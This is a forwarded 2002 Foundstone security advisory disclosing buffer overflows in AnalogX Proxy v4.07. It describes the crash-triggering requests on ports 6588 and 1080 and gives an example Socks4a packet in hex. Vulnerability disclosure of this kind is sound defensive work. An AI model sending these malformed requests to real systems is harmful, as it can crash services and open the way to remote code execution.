Dave Ahmad SecurityFocus www.securityfocus.com ---------- Forwarded message ---------- Return-Path: <labs@foundstone.com> Delivered-To: da@securityfocus.com Received: (qmail 13630 invoked from network); 1 Jul 2002 21:32:14 -0000 Received: from unknown (HELO mission.foundstone.com) (66.192.0.2) by mail.securityfocus.com with SMTP; 1 Jul 2002 21:32:14 -0000 X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3 content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Subject: Foundstone Advisory - Buffer Overflow in AnalogX Proxy Date: Mon, 1 Jul 2002 14:37:44 -0700 Message-ID: <9DC8A3D37E31E043BD516142594BDDFAC47577@MISSION.foundstone.com> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: Foundstone Advisory - Buffer Overflow in AnalogX Proxy Thread-Index: AcIhR4n3TkCXBJz4TAqNDSFSrIolUg== From: "Foundstone Labs" <labs@foundstone.com> To: <da@securityfocus.com> ---------------------------------------------------------------------- FS Advisory ID: FS-070102-23-AXPR Release Date: July 1st, 2002 Product: AnalogX Proxy Vendor: AnalogX (http://www.analogx.com) Vendor Advisory: See vendor web site Type: Buffer Overflow Severity: High Author: Robin Keir (robin.keir@foundstone.com) Foundstone, Inc. (http://www.foundstone.com) Operating Systems: Windows variants Vulnerable versions: Proxy v4.07 and previous Foundstone Advisory: http://www.foundstone.com/advisories.htm --------------------------------------------------------------------- Description A buffer overflow exists in AnalogX's Proxy software. Exploitation of this vulnerability allows remote execution of arbitrary code with the privileges of the Proxy daemon. Details Web Proxy overflow Sending a HTTP proxy request to the target system on TCP port 6588 consisting of a single space character followed by 320 or more non-space characters followed by 2 carriage-return linefeeds causes a read access violation in the application. Manually dismissing the application error message box that is displayed on the affected system at this point will terminate the process. If the message box is not manually dismissed then repeated sending of the request causes repeated access violation message boxes to appear on the affected system up to the point where the service no longer responds. Different number of bytes sent cause different error conditions to occur, such as write access violations and Watcom memory error dialogs to appear. Socks4a buffer overflow. Sending a Sock4a request to the target system on TCP port 1080 consisting of a hostname section of 140 or more characters will cause a write access violation application error. Manually dismissing the application error message box that is displayed on the affected system at this point will terminate the process. If the message box is not manually dismissed then repeated sending of the request causes repeated access violation message boxes to appear on the affected system up to the point where the service no longer responds. An example TCP packet to send is \x04\x01\x04\x38\x00\x00\x00abcd\x00#\x00 where the '\xXX' characters signify their corresponding HEX binary values and the '#' is substituted with the DNS name of 140 or more characters. Solution: Refer to the vendor's web site for further details: http://www.analogx.com Credits: Foundstone would like to thank AnalogX for their prompt response and handling of this problem. Disclaimer: The information contained in this advisory is copyright (c) 2002 Foundstone, Inc. and is believed to be accurate at the time of publishing, but no representation of any warranty is given, express, or implied as to its accuracy or completeness. In no event shall the author or Foundstone be liable for any direct, indirect, incidental, special, exemplary or consequential damages resulting from the use or misuse of this information. This advisory may be redistributed, provided that no fee is assigned and that the advisory is not modified in any way.
